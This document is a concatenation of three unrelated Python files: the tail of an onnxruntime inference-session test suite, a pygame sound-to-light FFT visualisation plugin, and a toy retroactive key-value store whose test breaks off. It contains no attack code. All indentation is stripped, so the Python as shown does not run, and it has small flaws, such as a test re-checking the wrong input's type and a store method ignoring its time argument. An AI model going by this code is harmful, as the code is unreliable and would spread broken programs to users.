x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(
self.get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(self.get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output Y has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
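# (np.bool is an alias of the builtin bool; newer numpy releases remove the
# alias, so plain bool would also work here.)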
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array(
[[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'],
dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'],
dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'],
object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'],
np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'],
['identity', 'test\x00\x00\x00\x00']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testZipMapStringFloat(self):
sess = onnxrt.InferenceSession(
self.get_name("zipmap_stringfloat.onnx"))
x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0],
dtype=np.float32).reshape((2, 3))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(float)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Z")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(map(string,tensor(float)))')
output_expected = [{'class2': 0.0, 'class1': 1.0, 'class3': 3.0},
{'class2': 23.0, 'class1': 44.0, 'class3': 11.0}]
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testZipMapInt64Float(self):
sess = onnxrt.InferenceSession(self.get_name("zipmap_int64float.onnx"))
x = np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0],
dtype=np.float32).reshape((2, 3))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(float)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Z")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(map(int64,tensor(float)))')
output_expected = [{10: 1.0, 20: 0.0, 30: 3.0},
{10: 44.0, 20: 23.0, 30: 11.0}]
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(
self.get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testDictVectorizer(self):
sess = onnxrt.InferenceSession(
self.get_name("pipeline_vectorize.onnx"))
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "float_input")
input_type = str(sess.get_inputs()[0].type)
self.assertEqual(input_type, "map(int64,tensor(float))")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "variable1")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(float)")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [1, 1])
# Python type
x = {0: 25.0, 1: 5.13, 2: 0.0, 3: 0.453, 4: 5.966}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
xwrong = x.copy()
xwrong["a"] = 5.6
try:
res = sess.run([output_name], {input_name: xwrong})
except RuntimeError as e:
self.assertIn(
"Unexpected key type <class 'str'>, it cannot be linked to C type int64_t", str(e))
# numpy type
x = {np.int64(k): np.float32(v) for k, v in x.items()}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
x = {np.int64(k): np.float64(v) for k, v in x.items()}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
x = {np.int32(k): np.float64(v) for k, v in x.items()}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testLabelEncoder(self):
sess = onnxrt.InferenceSession(self.get_name("LabelEncoder.onnx"))
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "input")
input_type = str(sess.get_inputs()[0].type)
self.assertEqual(input_type, "tensor(string)")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [1, 1])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "variable")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(int64)")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [1, 1])
# Array
x = np.array([['4']])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[3]], dtype=np.int64)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
# Python type
x = np.array(['4'], ndmin=2)
res = sess.run([output_name], {input_name: x})
output_expected = np.array([3], ndmin=2, dtype=np.int64)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
x = np.array(['4'], ndmin=2, dtype=object)  # np.object is removed in modern numpy
res = sess.run([output_name], {input_name: x})
output_expected = np.array([3], ndmin=2, dtype=np.int64)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def test_run_model_mlnet(self):
sess = onnxrt.InferenceSession(self.get_name("mlnet_encoder.onnx"))
names = [_.name for _ in sess.get_outputs()]
self.assertEqual(['C00', 'C12'], names)
c0 = np.array([5.], dtype=np.float32).reshape(1, 1)
c1 = np.array([b'A\0A\0', b"B\0B\0", b"C\0C\0"], np.void).reshape(1, 3)
res = sess.run(None, {'C0': c0, 'C1': c1})
mat = res[1]
total = mat.sum()
self.assertEqual(total, 2)
self.assertEqual(list(mat.ravel()),
list(np.array([[[0., 0., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.]]]).ravel()))
# In memory, the size of each element is fixed and equal to the
# longest element. We cannot use bytes because numpy is trimming
# every final 0 for strings and bytes before creating the array
# (to save space). It does not have this behaviour for void
# but as a result, numpy does not know anymore the size
# of each element, they all have the same size.
c1 = np.array([b'A\0A\0\0', b"B\0B\0", b"C\0C\0"],
np.void).reshape(1, 3)
res = sess.run(None, {'C0': c0, 'C1': c1})
mat = res[1]
total = mat.sum()
self.assertEqual(total, 0)
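# Added note for clarity (not in the original test): with the default bytes
# ('S') dtype, numpy strips trailing NUL bytes when an element is read back,
# so b'A\0A\0' comes out as b'A\0A'. With np.void the raw bytes are kept,
# but every element is padded to the size of the longest one, which is why
# the 5-byte b'A\0A\0\0' above no longer matches the 4-byte encoding and
# the one-hot sum drops to 0.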
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# The default should be basic optimization.
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_BASIC)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool_)  # np.bool is removed in modern numpy
b = np.array([[True, False], [True, False]], dtype=np.bool_)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(self.get_name("sequence_length.onnx"))
x = [np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(
self.get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(self.get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {"tensor": np.array(
[1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), "input_seq": []})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
if __name__ == '__main__':
unittest.main()
|
sound_to_light.py | from VisualisationPlugin import VisualisationPlugin
import pygame
from DDRPi import FloorCanvas
import logging
import math
import colorsys
import numpy
import threading
import pyaudio
import scipy
import scipy.fftpack
import scipy.io.wavfile
import wave
from lib.controllers import ControllerInput
class SoundToLightVisualisationPlugin(VisualisationPlugin):
logger = logging.getLogger(__name__)
def __init__(self):
self.clock = pygame.time.Clock()
self.logger.info("Initialising SoundToLightVisualisationPlugin")
# Initialise the data structure
self.max_retained_samples = 100
self.fftsize = 512
self.data = numpy.zeros((self.max_retained_samples, self.fftsize // 2), dtype=int)
self.scrolling = False
self.modes = ["scrolling", "latest"]
self.mode = self.modes[1]
self.chunk_policies = ["linear", "exp"]
self.chunk_policy = self.chunk_policies[1]
self.rolling_max = [0 for i in range(100)]
self.rolling_max_position = 0
def start(self):
t_rec = threading.Thread(target=self.record) # make thread for record()
t_rec.daemon = True # daemon mode forces thread to quit with program
t_rec.start() # launch thread
def configure(self, config):
self.config = config
# Set the mode to the requested value, if present
try:
mode = self.config["mode"]
if mode.lower() in self.modes:
self.mode = mode.lower()
except (AttributeError, ValueError, KeyError):
pass
# Set the binning algorithm to the requested one, if present
try:
policy = self.config["policy"]
if policy.lower() in self.chunk_policies:
self.chunk_policy = policy.lower()
except (AttributeError, ValueError, KeyError):
pass
self.logger.info("Config: %s" % config)
"""
Handle the pygame event sent to the plugin from the main loop
"""
def handle_event(self, e):
if (e.type == pygame.JOYBUTTONDOWN):
if e.button == ControllerInput.BUTTON_A:
if len(self.modes) > 0:
self.mode = self.modes[0]
return None
if e.button == ControllerInput.BUTTON_B:
if len(self.modes) > 1:
self.mode = self.modes[1]
return None
if e.button == ControllerInput.BUTTON_X:
if len(self.chunk_policies) > 0:
self.chunk_policy = self.chunk_policies[0]
return None
if e.button == ControllerInput.BUTTON_Y:
if len(self.chunk_policies) > 1:
self.chunk_policy = self.chunk_policies[1]
return None
return e
def draw_frame(self, canvas):
canvas = self.draw_surface(canvas, pygame.time.get_ticks())
# Limit the frame rate.
# This sleeps so that at least 25ms has passed since tick()
# was last called. It is a no-op if the loop is running slow
# Draw whatever this plugin does
return canvas
def draw_splash(self, canvas):
canvas.set_colour((0, 0, 0))
w = canvas.get_width()
h = canvas.get_height()
# Draw something that looks vaguely like an EQ
for x in range(w):
# Two humps
height = h * 0.75 * math.cos(math.pi * float(x) / w) ** 2
# Decrease the humps
height *= math.cos((math.pi / 2.0) * float(x) / w)
canvas.draw_line(x, h, x, (h - 1) - int(height), (0xFF, 0, 0))
return canvas
def draw_surface(self, canvas, t=0):
canvas.set_colour((0, 0, 0))
if self.data is not None:
max_average = max(255, int(sum(self.rolling_max) / len(self.rolling_max)))
block_values = []
if self.mode == "scrolling":
for x in range(canvas.get_width()):
# Skip a sample if there isn't enough data available
if x >= len(self.data):
continue
# Index from the end so that x == 0 is the newest sample
latest = self.data[-(x + 1)]
number_of_chunks = canvas.get_height()
# Make a copy of the array and reverse it -
# thus making the lowest frequency bin at [0] (traditionally left)
new_data = latest[::-1]
#self.logger.info("Input data %s" % new_data)
# Split it down into chunks, which is how wide the floor is.
# Using an exponential function helps approximate notes a bit better
# where all the lower ones are closely spaced, but the higher ones
# are further apart
new_data = self.chunk_data(new_data, canvas.get_height(), self.chunk_policy)
#self.logger.info("Chunked data: %s" % new_data)
peak_value = max(max(new_data), 50)
#self.logger.info("Peak value: %s" % peak_value)
# Store the rolling max
self.rolling_max[self.rolling_max_position] = peak_value
self.rolling_max_position += 1
if self.rolling_max_position >= len(self.rolling_max): self.rolling_max_position = 0
# Two options, either max, or mean
#standard_peak_value = max(max(self.rolling_max), 50) / 2
standard_peak_value = max(int(numpy.mean(self.rolling_max)), 255)
# Scale everything to the peak value to be in the range [0,1]
scaled_data = []
for i in range(number_of_chunks):
scaled_data.append(new_data[i] / float(standard_peak_value))
for y in range(number_of_chunks):
scaled_value = min(255, int(255 * scaled_data[y]))
canvas.set_pixel(x, y, (scaled_value, scaled_value, scaled_value))
elif self.mode == "latest":
latest = self.data[-1]
number_of_chunks = canvas.get_width()
# Make a copy of the array and reverse it -
# thus making the lowest frequency bin at [0] (traditionally left)
new_data = self.data[-1][::-1]
#self.logger.info("Input data %s" % new_data)
# Split it down into chunks, which is how wide the floor is.
# Using an exponential function helps approximate notes a bit better
# where all the lower ones are closely spaced, but the higher ones
# are further apart
new_data = self.chunk_data(new_data, canvas.get_width(), self.chunk_policy)
#self.logger.info("Chunked data: %s" % new_data)
peak_value = max(max(new_data), 50)
#self.logger.info("Peak value: %s" % peak_value)
# Store the rolling max
self.rolling_max[self.rolling_max_position] = peak_value
self.rolling_max_position += 1
if self.rolling_max_position >= len(self.rolling_max): self.rolling_max_position = 0
# Two options, either max, or mean
#standard_peak_value = max(max(self.rolling_max), 50) / 2
standard_peak_value = max(int(numpy.mean(self.rolling_max)), 50)
# Scale everything to the peak value
scaled_data = []
for i in range(number_of_chunks):
scaled_data.append(new_data[i] / float(standard_peak_value))
for column in range(canvas.get_width()):
height_int = int(canvas.get_height() * scaled_data[column])
for y in range(height_int):
canvas.set_pixel(column, canvas.get_height() - y,
(0xFF, max(0xFF - int(1.5 * y * (256. / (max(height_int, 1)))), 0), 0))
#self.draw_flame_to(canvas, column, 0, height_int)
self.clock.tick(25)
return canvas
def chunk_data(self, data, number_of_chunks, scaling="linear"):
chunks = []
if scaling == "linear":
elements_per_block = len(data) // number_of_chunks
for i in range(number_of_chunks):
count = 0
total = 0
for x in range(elements_per_block):
count += 1
total += data[x + i * elements_per_block]
if count > 0:
chunks.append(total // count)
elif scaling == "exp":
# The lower frequencies are more closely packed, so don't
# evenly split the chunks, instead spread the lower frequencies
# out more following a rough exponential type curve
#self.logger.info("length of input - %d" % len(data))
# Calculate the distribution along the exponential
elements_per_block = [0 for i in range(number_of_chunks)]
e = 1.5
m = 0.5
for x in range(number_of_chunks):
elements_per_block[x] = e ** (x * m)
#self.logger.info("Exponential chunks: %s" % elements_per_block)
#self.logger.info("Exponential chunk total: %d" % sum(elements_per_block))
# Scale up so the total number of buckets is about the total
# we have to spread out
multiplier = len(data) / sum(elements_per_block)
for x in range(number_of_chunks):
elements_per_block[x] = max(1, int(multiplier * elements_per_block[x]))
#self.logger.info("Exponential chunks normalised: %s" % elements_per_block)
#self.logger.info("Exponential chunk total: %d" % sum(elements_per_block))
# Don't include the DC term
#elements_per_block[0] = 0
# Add the required number to each bucket and calculate the average
count = 0
for i in range(number_of_chunks):
elements = 0
total = 0
#self.logger.info("Putting %d elements in block %d" % (elements_per_block[i], i))
for j in range(elements_per_block[i]):
elements += 1
if count < len(data):
total += data[count]
#self.logger.info(" %s" % data[count])
count += 1
if elements > 0:
chunks.append(total // elements)
else:
chunks.append(0)
#self.logger.info("Exp chunk data: %s" % chunks)
return chunks
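# Worked example (illustrative, using the constants above): with
# number_of_chunks = 4 the raw weights are 1.5 ** (x * 0.5) for x in 0..3,
# i.e. [1.00, 1.22, 1.50, 1.84], total ~5.56. For len(data) == 256 the
# multiplier is ~46.0, giving blocks of roughly [46, 56, 69, 84] bins: the
# low-frequency end gets narrow buckets, the high end wide ones.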
def draw_flame_to(self, canvas, column, from_row, to_row):
delta = int(abs(to_row - from_row))
# self.logger.info("Flame height %d, %d" % (column, delta))
for row in range(delta):
canvas.set_pixel(column, from_row + row,
(0xFF, max(0xFF - int(1.5 * row * (256. / (max(delta, 1)))), 0), 0))
#canvas.set_pixel(column, from_row + row, (0xFF,0,0))
return None
# Reformats a color tuple in the range [0, 1] into a 0-255
# integer representation.
def reformat(self, color):
return int(round(color[0] * 255)), \
int(round(color[1] * 255)), \
int(round(color[2] * 255))
def record(self):
# Based off code from:
# http://www.swharden.com/blog/2010-06-19-simple-python-spectrograph-with-pygame/
rate = 12000 #try 5000 for HD data, 48000 for realtime
overlap = 5 #1 for raw, realtime - 8 or 16 for high-definition
self.logger.info("Opening Audio Stream")
p = pyaudio.PyAudio()
inStream = p.open(format=pyaudio.paInt16, channels=1, rate=rate, input=True)
linear = [0] * self.fftsize
while True:
#self.logger.info("Initiating Audio Stream Read")
linear = linear[self.fftsize // overlap:]
pcm = numpy.frombuffer(inStream.read(self.fftsize // overlap), dtype=numpy.int16)
linear = numpy.append(linear, pcm)
# Convert the PCM wave format to FFT
ffty = scipy.fftpack.fft(linear)
ffty = abs(ffty[0:len(ffty) // 2]) / 500  # FFT is mirror-imaged
#print "MIN:\t%s\tMAX:\t%s"%(min(ffty),max(ffty))
# First shift all the data to the left
self.data = numpy.roll(self.data, -1, 0)
# Make the last column equal to the new data
self.data[-1] = ffty[::-1]
|
store.py | """ Library for a simple retroactively-updatable key-value store. """
import threading
import views
class RStore(object):
""" A retroactively-updatable interface. """
def __init__(self, cls):
"""
Initializes a new retroactively-updatable key-value store, wrapping around
the given storage class.
The underlying class must support the mutators delete() and insert(), as
well as the observer select().
Note that this initializer creates a new instance of cls to wrap.
Args:
cls (class): the base storage class
"""
self._store = cls()
def add(self, t, op, *args):
"""
Adds the operation op(args) to the underlying storage class at time t.
Assumes no other operation already exists at time t.
Args:
t (int): the time to add the operation
op (str): the operation to apply
args (tuple(object)): the arguments to op
"""
record = getattr(self._store, op)(*args)
if "insert" == op:
# Make callbacks
for cb in self._store._insert_callbacks:
threading.Thread(target=cb, args=(record,)).start()
def erase(self, t):
"""
Retroactively erases the operation added at time t.
Assumes that there is an operation to erase at time t.
Args:
t (int): the time at which to erase an operation
"""
record = self._store.delete(t)
# Make callbacks
for cb in self._store._delete_callbacks:
threading.Thread(target=cb, args=(record,)).start()
def observe(self, func, *args):
"""
Observe the store at present time, with the given observation function and
its arguments.
Args:
func (str): the observation function to invoke
args (tuple(object)): the arguments to the observation function
Returns the result of the observation.
"""
return getattr(self._store, func)(*args)
def __repr__(self):
return "RStore -> " + str(self._store)
class Store(object):
""" Contains the non-retroactive part of the key-value store. """
def __init__(self):
self._delete_callbacks = ()
self._insert_callbacks = ()
self._records = {}
# Mutators
def delete(self, key):
""" Deletes the Record for the given key and returns the deleted record.
Assumes key does exist in the Store.
Args:
key (hashable): the key whose Record we want to delete
"""
record = self._records[key]
del self._records[key]
return record
def insert(self, key, *values):
"""
Creates and inserts a Record for the given key, and returns the created
Record.
Assumes key does not already exist in the Store.
Args:
key (hashable): the key to use
values (tuple(object)): the value(s) to associate with the key
"""
record = Record(key, *values)
self._records[key] = record
return record
# Observers
def min(self, index=0):
"""
Returns the min of all the Records' values at the given index.
Args:
index (int): the index of the values over which we want to compute the
min. Defaults to 0, the keys.
"""
return views.Min(self, index)
def select(self, key):
"""
Returns the Record for the given key.
Assumes key does exist in the Store.
Args:
key (hashable): the key whose Record we want to retrieve
"""
return self._records[key]
def sum(self, index=0):
"""
Returns the sum of all the Records' values at the given index.
Args:
index (int): the index of the values we want to retrieve. Defaults to 0,
the keys.
"""
return views.Sum(self, index)
# Callbacks
def add_delete_callback(self, func):
self._delete_callbacks += (func,)
def add_insert_callback(self, func):
self._insert_callbacks += (func,)
# Magic functions
def __repr__(self):
records = (str(record) for record in self._records.values())
return "Store (%d elements):\n %s" % (
len(self._records), "\n ".join(records))
class Record(object):
"""
Contains a single record of information, such as about the key, value(s),
etc.
"""
def __init__(self, key, *values):
"""
Creates a Record for the provided key and value(s).
Args:
key (hashable): the key to use
values (tuple(object)): the value(s) to associate with the key
"""
self._key = key
self._values = (key,) + values
def key(self):
""" Returns the Record's key. """
return self._key
def values(self):
""" Returns the Record's associated value(s). """
return self._values
def __repr__(self):
return "Record[%s |-> %s]" % (self._key, str(self._values))
def get_test():
""" Testing store.py """
s = RStore(Store)
print("Empty RStore:", s)
t, op, k, v = 3, "insert", 1, 2
print("Adding %s(%s, %s) at time %d" % (op, k, v, t))
s.add(t, op, k, v)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
rsum = s.observe("sum", 1)
print("Retrosum(1):", rsum)
rmin = s.observe("min", 1)
print("Retromin(1):", rmin)
t, op, k, v = 1, "insert", 4, 5
print("Adding %s(%s, %s) at time %d" % (op, k, v, t))
s.add(t, op, k, v)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
t, op, k, v = 8, "insert", -1, -2
print("Adding %s(%s, %s) at time %d" % (op, k, v, t))
s.add(t, op, k, v)
print("State:", s)
